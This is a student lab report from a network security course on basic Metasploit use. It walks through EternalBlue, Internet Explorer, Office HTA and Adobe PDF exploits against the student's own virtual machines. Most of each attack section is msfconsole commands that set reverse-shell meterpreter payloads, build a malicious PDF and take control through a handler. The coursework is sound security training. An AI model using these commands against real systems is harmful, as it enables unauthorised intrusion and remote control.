NetSec2019 20165327 EXP5 MSF基础应用

实践目标

本实践目标是掌握metasploit的基本应用方式，重点常用的三种攻击方式的思路。具体需要完成：

1.1一个主动攻击实践，如ms08_067; （1分）

①ms17_010_eternalblue（成功）
②ms17_010_psexec（唯一）

1.2 一个针对浏览器的攻击，如ms11_050；（1分）

①ms11_050_mshtml_cobjectelement（成功）
②office_word_hta（成功）
③aim_goaway（唯一）

1.3 一个针对客户端的攻击，如Adobe；（1分）

adobe_toolbutton（成功）

1.4 成功应用任何一个辅助模块（唯一）（0.5分）

①title
②trace
②copy_of_file
以上四个小实践可不限于以上示例，并要求至少有一个是和其他所有同学不一样的，否则扣除0.5分。

1.1一个主动攻击实践，如ms08_067; （1分）

①ms17_010_eternalblue（简介：永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞，该漏洞导致攻击者在目标系统上可以执行任意代码。）
攻击方：kali 192.168.118.130
靶机： win7 192.168.118.131
进入msfconsole输入 use exploit/windows/smb/ms17_010_eternalblue。并且通过show payloads 显示可用攻击载荷。

设置tcp反向连接：set payload generic/shell_reverse_tcp
配置参数：
set LHOST 192.168.118.130
set LPORT 5327
set RHOST 192.168.118.131
set target 0//自动选择目标系统类型，匹配度较高
show options//查看设置是否正确

exploit:监听开始

控制成功在靶机目录下建个文件：

靶机方发现自己多了个不是自建的文件：

②ms17_010_psexec（唯一：粘贴到搜索引擎还没一样的）
步骤同上：

然而……
再来，参考了网上
下了一个win2003虚拟机，再次测试：

命运多舛……

1.2 一个针对浏览器的攻击，如ms11_050；（1分）

①ms11_050_mshtml_cobjectelement
攻击方：kali 192.168.118.137（换网IP有变化）
靶机： win7 192.168.118.131（此为win7，138为XP）
use windows/browser/ms11_050_mshtml_cobjectelement
set payload windows/meterpreter/reverse_http
set LHOST 192.168.118.137
set LPORT 5327
set URIPATH yjt5327
exploit

分别用win7和XP连

②office_word_hta
攻击方：kali 192.168.118.130
靶机： win7 192.168.118.131

启动msfconsole并使用模块use exploit/windows/fileformat/office_word_hta
查看目标show targets
show options

看到已经默认帮我们配置好了，我们只需要run执行即可，相应的产生了一个URL。

在靶机的IE浏览器中输入KALI中生成的URL，出现一个窗口，点击运行即可：

看到kali那里已经产生了session会话，我们按下回车回到命令行，使用sessions -i 1来与第一个session建立连接,再输入shell拿到权限：

控制成功：

③aim_goaway
靶机：xp
步骤同上：
通过info查看其攻击原理以及适用对象

配置同前面，xp访问生成的地址

监听结果：

Sending AOL Instant Messenger goaway Overflow
意思是AIM即时通发送消息即可产生溢出攻击吧，搜索AOL Instant Messenger这款软件发现2017年末已经停止服务。

1.3 一个针对客户端的攻击，如Adobe；（1分）

实际运用：adobe_toolbutton
攻击方：kali 192.168.118.137（由热点变为校园网以后）
靶机： winxp 192.168.118.138
步骤：
use windows/fileformat/adobe_toolbutton
set payload windows/meterpreter/reverse_tcp //tcp反向回连
set LHOST 192.168.118.137 //攻击机ip
set LPORT 5327 //攻击端口
set FILENAME yjt5327.pdf //设置生成pdf文件的名字
exploit //生成文件

(将生成的文件放到XP环境下，注意开始在root找不到文件，用Ctrl+h显示隐藏文件即可)

use exploit/multi/handler //使用监听模块
msfexploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
set LHOST 192.168.118.137 //攻击机ip
set LPORT 5327 //设置端口
exploit //监听

xp端用Adobe打开文件